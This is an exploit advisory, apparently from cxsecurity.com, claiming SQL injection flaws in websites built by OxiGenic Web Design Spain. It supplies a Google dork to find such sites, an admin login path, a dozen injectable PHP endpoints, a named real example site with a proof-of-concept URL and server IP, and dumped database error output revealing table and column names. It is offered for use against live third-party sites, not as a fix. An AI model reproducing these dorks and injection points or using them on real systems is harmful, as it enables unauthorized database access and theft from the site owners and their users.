Desarrollado por OxiGenic Web Design Spain SQL Injection

2019.01.15
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:''Desarrollado por OXIGENIC''

#################################################################### # Exploit Title : Desarrollado por OxiGenic Web Design Spain SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 15/01/2019 # Vendor Homepage : oxigenic.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Desarrollado por OXIGENIC'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] #################################################################### # Admin Panel Login Path : ************************* /admin # SQL Injection Exploit : *********************** /notificacion.php?id=[SQL Injection] /noticias.php?id=[SQL Injection] /fotogal_cp.php?id=[SQL Injection] /fotocp.php?id=[SQL Injection] /pesca.php?id=[SQL Injection] /fotocp.php?id=[SQL Injection] /printentrevista.php?id=[SQL Injection] /acto.php?id=[SQL Injection] /asoc.php?id=[SQL Injection] /cazal.php?sec=[SQL Injection] /asocl.php?sec=[SQL Injection] /fotoacto.php?id=[SQL Injection] #################################################################### # Example Vulnerable Site : ************************* [+] bardenasreales.es/notificacion.php?id=41%27 => [ Proof of Concept ] => archive.is/fpP4F Note : (149.202.228.232) => There are 403 domains hosted on this server. #################################################################### # SQL Database Error : ********************** Database error: Invalid SQL: SELECT articulos.id AS id, fecha, tema, titulo, subtitulo, texto, foto1, foto1_m, foto2, foto2_p, foto3, foto3_p, foto4, foto4_p, foto5, foto5_p, foto6, foto6_p, pie1, pie2, pie3, pie4, pie5, pie6, informa, fotosde, notrelacionada1, notrelacionada2, notrelacionada3, enlace1, url1, enlace2, url2, enlace3, url3, fuente, urlfuente FROM articulos,temas WHERE articulos.activo='1' AND temas.id=articulos.tema AND temas.activo='1' AND articulos.id='126'' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''126''' at line 41) Session halted. Database error: Invalid SQL: SELECT id, fecha, titulo, texto, informa, foto1 FROM notificaciones WHERE id='41'' AND activo='1' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 8) Session halted. Database error: Invalid SQL: SELECT foto, pie FROM galerias_cp WHERE id='113'' AND activo='1' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 4) Session halted. Database error: Invalid SQL: SELECT cazapesca.id AS id, fecha, titulo, subtitulo, texto, foto1, foto1_p, pie1, foto2, foto2_p, pie2, foto3, foto3_p, pie3, foto4, foto4_p, pie4, foto5, foto5_p, pie5, foto6, foto6_p, pie6, idsubcat, cazapescasubcat.nombre AS subsec, idcat FROM cazapesca, cazapescasubcat WHERE cazapesca.activo='1' AND cazapescasubcat.id=cazapesca.idsubcat AND cazapescasubcat.idcat='2' AND cazapescasubcat.activo='1' AND cazapesca.id='26'' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''26''' at line 32) Session halted. Database error: Invalid SQL: SELECT foto as foto, pie as pie FROM cazapesca WHERE id='266'' AND activo='1' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 4) Session halted. Database error: Invalid SQL: SELECT * FROM entrevistas WHERE id='6'' AND activo='1' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 3) Session halted. Database error: Invalid SQL: SELECT cazapesca.id AS id, fecha, titulo, subtitulo, texto, foto1, foto1_p, pie1, foto2, foto2_p, pie2, foto3, foto3_p, pie3, foto4, foto4_p, pie4, foto5, foto5_p, pie5, foto6, foto6_p, pie6, idsubcat, cazapescasubcat.nombre AS subsec, idcat FROM cazapesca, cazapescasubcat WHERE cazapesca.activo='1' AND cazapescasubcat.id=cazapesca.idsubcat AND cazapescasubcat.idcat='3' AND cazapescasubcat.activo='1' AND cazapesca.id='156'' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''156''' at line 32) Session halted. #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top